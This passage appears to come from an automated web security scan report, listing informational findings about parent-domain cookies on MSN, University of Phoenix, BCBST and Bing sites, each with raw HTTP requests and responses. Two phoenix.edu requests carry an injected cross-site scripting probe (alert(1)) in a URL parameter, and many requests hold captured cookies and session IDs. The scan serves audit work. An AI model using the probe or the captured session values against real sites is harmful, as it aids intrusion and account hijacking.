Set-Cookie: _msuuid=923F0BAD-ECCD-4A46-B765-0D3484A87F4C; Domain=marinsm.com; Expires=Wed, 25-Apr-2012 18:46:41 GMT; Path=/

GIF89a.............,...........D..;

13.74. http://usmoneytaxes.opt.video.msn.com/optimizevc.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usmoneytaxes.opt.video.msn.com
Path:   /optimizevc.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optimizevc.aspx?csid=&p=usMoneyTaxes&ind=1&ps=4&gc=1&ver=2&alg=&cfgCsid=MSNmoney&cfgName=money-gallery-v2-site-wide&ck=gal&pl=http%3A%2F%2Fmoney.msn.com%2Ftaxes%2F HTTP/1.1
Host: usmoneytaxes.opt.video.msn.com
Proxy-Connection: keep-alive
Referer: http://img.widgets.video.s-msn.com/fl/gallerywidget/current/gallerywidget.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=600
Content-Type: text/xml; charset=utf-8
Expires: Tue, 26 Apr 2011 18:50:18 GMT
Last-Modified: Tue, 26 Apr 2011 18:40:18 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lastVisit1=4/26/2011 6:40:18 PM; expires=Tue, 26-Apr-2061 18:40:18 GMT; path=/
Set-Cookie: opd=; domain=opt.video.msn.com; expires=Tue, 26-Apr-2011 19:40:18 GMT; path=/
Set-Cookie: flt=32677; domain=opt.video.msn.com; expires=Tue, 26-Apr-2061 18:40:18 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:40:17 GMT
Content-Length: 88

...<data><context tk="&amp;lv=inf&amp;rt=no&amp;ck=gal&amp;flt=var-A&amp;r=14" /></data>

13.75. http://video.msn.com/soapboxservice2.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://video.msn.com
Path:   /soapboxservice2.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /soapboxservice2.aspx?mn=GetCountryCode HTTP/1.1
Host: video.msn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; s_cc=true; s_sq=%5B%5BB%5D%5D; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/xml; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Machine: CH1********910
X-AspNet-Version: 2.0.50727
Set-Cookie: zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; domain=msn.com; expires=Tue, 03-May-2011 18:46:54 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:46:54 GMT
Connection: keep-alive
Content-Length: 136

<ReverseIPResult><CountryCode>US</CountryCode><StatusCode>Success</StatusCode><Zip>75207</Zip><IP>173.193.214.243</IP></ReverseIPResult>

13.76. http://www.actonsoftware.com/acton/bn/1091/visitor.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.actonsoftware.com
Path:   /acton/bn/1091/visitor.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /acton/bn/1091/visitor.gif?ts=1303851449256&ref=http%3A//www.moxiesoft.com/tal_products/employee-spaces.aspx HTTP/1.1
Host: www.actonsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.moxiesoft.com/tal_products/products.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wp1091=UTCUDDDDDDTTKKXJ

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: wp1091=UTCUDDDDDDTTKKXJ; Domain=.actonsoftware.com; Expires=Wed, 25-Apr-2012 20:57:19 GMT; Path=/
P3P: CP="ALL CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: image/gif;charset=UTF-8
Content-Length: 43
Date: Tue, 26 Apr 2011 20:57:19 GMT

GIF89a.............!.......,...........L..;

13.77. http://www.aptm.phoenix.edu/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:45:12 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=47060; Domain=.phoenix.edu; Path=/
Set-Cookie: crk=134809332.2; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 21:59:19 GMT; Path=/
Set-Cookie: vid=51857023; Domain=.phoenix.edu; Path=/
Set-Cookie: country=US; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 21:59:19 GMT; Path=/
Set-Cookie: postal_code=5672; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 21:59:19 GMT; Path=/
Set-Cookie: plid=47060; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 21:59:19 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 44049

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...

13.78. http://www.aptm.phoenix.edu/AptiNet/HTTPHandlerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /AptiNet/HTTPHandlerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /AptiNet/HTTPHandlerServlet HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://www.aptm.phoenix.edu/?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr68743%22%3balert(1)//bb61ffcaafd&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1
Cache-Control: max-age=0
Origin: http://www.aptm.phoenix.edu
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aptmimpressions=34847_0608_909_11; cmTPSet=Y; CoreID6=27675665931513038435624&ci=90223951; __utmz=29294973.1303843563.1.1.utmcsr=s0.2mdn.net|utmccn=(referral)|utmcmd=referral|utmcct=/1676624/20DR_Button_Orange_728x90_F9_Tag.swf; linkplidlist=47054; crk=135047407.5; vid=51921951; country=US; postal_code=5672; plid=47054; __utma=29294973.1152394048.1303843563.1303843563.1303843563.1; __utmc=29294973; __utmb=29294973.4.10.1303843563; 90223951_clogin=l=1303843562&v=1&e=1303845583441
Content-Length: 2640

confirmpage=superfly&errpage=superfly&curpage=superfly&page=superfly&output=text%2Fhtml&disabletrackclick=Y&nextmppposition=2&igk=207229697.3%7C000000010225%7C&ordercount=0&channel=banr68743%22%3Baler
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:49:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=47054; Domain=.phoenix.edu; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 4935

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>Univer
...[SNIP]...

13.79. http://www.aptm.phoenix.edu/AptiNet/hhs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /AptiNet/hhs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /AptiNet/hhs HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://www.aptm.phoenix.edu/AptiNet/HTTPHandlerServlet
Cache-Control: max-age=0
Origin: http://www.aptm.phoenix.edu
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mppredirect=47054; aptmimpressions=34847_0608_909_11; cmTPSet=Y; CoreID6=27675665931513038435624&ci=90223951; __utmz=29294973.1303843563.1.1.utmcsr=s0.2mdn.net|utmccn=(referral)|utmcmd=referral|utmcct=/1676624/20DR_Button_Orange_728x90_F9_Tag.swf; crk=135047407.5; vid=51921951; country=US; postal_code=5672; plid=47054; __utma=29294973.1152394048.1303843563.1303843563.1303843563.1; __utmc=29294973; __utmb=29294973.4.10.1303843563; 90223951_clogin=l=1303843562&v=1&e=1303845583441; linkplidlist=47054
Content-Length: 834

pid=62A1E89CCBA3FB2D&pvp_design=design105&kw=design105&kw=&channel=banr68743%22%3Balert%281%29%2F%2Fbb61ffcaafd&category=&psrc=&psrc_url=&vrefid=&creative_id=38954353&creative_desc=20DR_Button_Orange_
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:49:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=47054%2C14771; Domain=.phoenix.edu; Path=/
Set-Cookie: state=-X-; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:04:00 GMT; Path=/
Set-Cookie: plid=47054%7C14771; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:04:00 GMT; Path=/
Set-Cookie: vid=51922099; Domain=.phoenix.edu; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 60076

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...

13.80. http://www.bcbst.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bcbst.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.bcbst.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Cteonnt-Length: 35610
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDSSADSTDQ=NIJBMDCDEMGENIAGHJCEJEJC; path=/
Set-Cookie: TLTSID=52C4235646B6CCC2C2C1DEB94AFC18A3; Path=/; Domain=.bcbst.com
Set-Cookie: TLTUID=52C4235646B6CCC2C2C1DEB94AFC18A3; Path=/; Domain=.bcbst.com expires=Tue, 26-04-2021 20:37:00 GMT
Date: Tue, 26 Apr 2011 20:36:59 GMT
Set-Cookie: NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660;path=/;httponly
Content-Length: 35610


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

13.81. http://www.bcbst.com/css/base.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bcbst.com
Path:   /css/base.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/base.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bcbst.com

Response

HTTP/1.1 200 OK
Cteonnt-Length: 314
Content-Type: text/css
Last-Modified: Fri, 05 Sep 2008 20:15:02 GMT
Accept-Ranges: bytes
ETag: "027e31394fc91:12e16"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTSID=D539845944B34AF293E6EC900CC04974; Path=/; Domain=.bcbst.com
Set-Cookie: TLTUID=D539845944B34AF293E6EC900CC04974; Path=/; Domain=.bcbst.com expires=Tue, 26-04-2021 20:25:46 GMT
Date: Tue, 26 Apr 2011 20:25:46 GMT
Set-Cookie: NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660;path=/;httponly
Cache-Control: private
Content-Length: 314

* {
   padding: 0;
   margin: 0;
}

h1, h2, h3, h4, h5, h6, p, pre, blockquote, label, ul, ol, dl, fieldset, address {
   margin: 1em 0%;
}
p {
   margin-bottom: 0.75em;
}
em, i {
}
strong, b {

...[SNIP]...

13.82. http://www.bcbst.com/css/footer.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bcbst.com
Path:   /css/footer.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/footer.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bcbst.com

Response

HTTP/1.1 200 OK
Cteonnt-Length: 1806
Content-Type: text/css
Last-Modified: Mon, 15 Sep 2008 18:38:31 GMT
Accept-Ranges: bytes
ETag: "802d50406217c91:19a987"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTSID=AF3AE7524554A5F996E41FA3B63CAB75; Path=/; Domain=.bcbst.com
Set-Cookie: TLTUID=AF3AE7524554A5F996E41FA3B63CAB75; Path=/; Domain=.bcbst.com expires=Tue, 26-04-2021 20:25:50 GMT
Date: Tue, 26 Apr 2011 20:25:49 GMT
Set-Cookie: NSC_xxx.cdctu.dpn!80=ffffffff099f1a6745525d5f4f58455e445a4a423660;path=/;httponly
Cache-Control: private
Content-Length: 1806

#ftrNav
{
clear:both;
width:760px;
margin:0 auto;
padding:0;
height:27px;
text-transform:lowercase;
text-align:center;
background-image:url(/images/2008/footer-background.png);
background-re
...[SNIP]...

13.83. http://www.bcbst.com/css/global.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bcbst.com
Path:   /css/global.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/global.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bcbst.com

Response

HTTP/1.1 200 OK
Cteonnt-Length: 50612
Content-Type: text/css
Last-Modified: Thu, 10 Mar 2011 19:00:13 GMT
Accept-Ranges: bytes
ETag: "801c9f6255dfcb1:12e16"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTSID=AFD3633742D08E3A418BF08983C24FD8; Path=/; Domain=.bcbst.com
Set-Cookie: TLTUID=AFD3633742D08E3A418BF08983C24FD8; Path=/; Domain=.bcbst.com expires=Tue, 26-04-2021 20:25:47 GMT
Date: Tue, 26 Apr 2011 20:25:47 GMT
Set-Cookie: NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660;path=/;httponly
Cache-Control: private
Content-Length: 50612

@import url(/css/lytebox.css);

/******************************
   Global 535240
******************************/
body {    margin: 0px;    font: 75% Arial, Verdana, sans-serif;line-height:150%;    color: #3
...[SNIP]...

13.84. http://www.bcbst.com/css/header.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bcbst.com
Path:   /css/header.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/header.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bcbst.com

Response

HTTP/1.1 200 OK
Cteonnt-Length: 4053
Content-Type: text/css
Last-Modified: Thu, 10 Mar 2011 19:05:06 GMT
Accept-Ranges: bytes
ETag: "05d431156dfcb1:12352"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTSID=7005EF8142C39A04A27FD58A5CC3020B; Path=/; Domain=.bcbst.com
Set-Cookie: TLTUID=7005EF8142C39A04A27FD58A5CC3020B; Path=/; Domain=.bcbst.com expires=Tue, 26-04-2021 20:25:49 GMT
Date: Tue, 26 Apr 2011 20:25:49 GMT
Set-Cookie: NSC_xxx.cdctu.dpn!80=ffffffff099f1a6445525d5f4f58455e445a4a423660;path=/;httponly
Cache-Control: private
Content-Length: 4053

#header
{
padding:11px 0 0 0;
width:760px;
margin:0 0 -5px;
clear:both;
display:block;
position:relative;
z-index:2;
}
#header .logo {
   margin-bottom:11px;

   float:left;
}

#header sma
...[SNIP]...

13.85. http://www.bcbst.com/css/lytebox.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bcbst.com
Path:   /css/lytebox.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/lytebox.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bcbst.com

Response

HTTP/1.1 200 OK
Cteonnt-Length: 6053
Content-Type: text/css
Last-Modified: Wed, 17 Oct 2007 16:46:23 GMT
Accept-Ranges: bytes
ETag: "80592440dd10c81:12e16"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTSID=58D76C0947B6D0D73504FB9229260D34; Path=/; Domain=.bcbst.com
Set-Cookie: TLTUID=58D76C0947B6D0D73504FB9229260D34; Path=/; Domain=.bcbst.com expires=Tue, 26-04-2021 20:25:48 GMT
Date: Tue, 26 Apr 2011 20:25:48 GMT
Set-Cookie: NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660;path=/;httponly
Cache-Control: private
Content-Length: 6053

#lbOverlay { position: fixed; top: 0; left: 0; z-index: 99998; width: 100%; height: 500px; }
   #lbOverlay.grey { background-color: #000000; }
   #lbOverlay.red { background-color: #330000; }
   #lbOverl
...[SNIP]...

13.86. https://www.bcbst.com/accounttools/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bcbst.com
Path:   /accounttools/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accounttools/ HTTP/1.1
Host: www.bcbst.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660; JSESSIONID=0000l6JFMG0zkOQi8ALpYNU9n7W:148u7ts85; NSC_xxx.cdctu.dpn!443=ffffffff099f143645525d5f4f58455e445a4a42378b; WT_FPC=id=173.193.214.243-104623456.30147664:lv=1303849539512:ss=1303849513702

Response

HTTP/1.1 302 Redirect
Date: Tue, 26 Apr 2011 20:25:50 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: Calling_URL=https://www.bcbst.com:443/accounttools/; path=/; domain=.bcbst.com;
Location: https://www.bcbst.com/secure/public/InvalidAccess.shtm


13.87. http://www.bing.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?scope=web&mkt=en-US&FORM=MSMONY HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1; SRCHD=MS=1744674&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF; _SS=SID=AB7953A0B3D04A9F997FC8B4990FFD89; _FS=mkt=en-US; _HOP=I=2&TS=1303843123

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 18:38:44 GMT
Connection: close
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Set-Cookie: _HOP=; domain=.bing.com; path=/
Content-Length: 28182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" ><head><me
...[SNIP]...

13.88. http://www.bing.com/sck  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /sck

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sck?cn=_SS&r=http://www.msn.com/sck.aspx&h=36aef2a7-994a-6863-3092-2a28e086b0e4 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
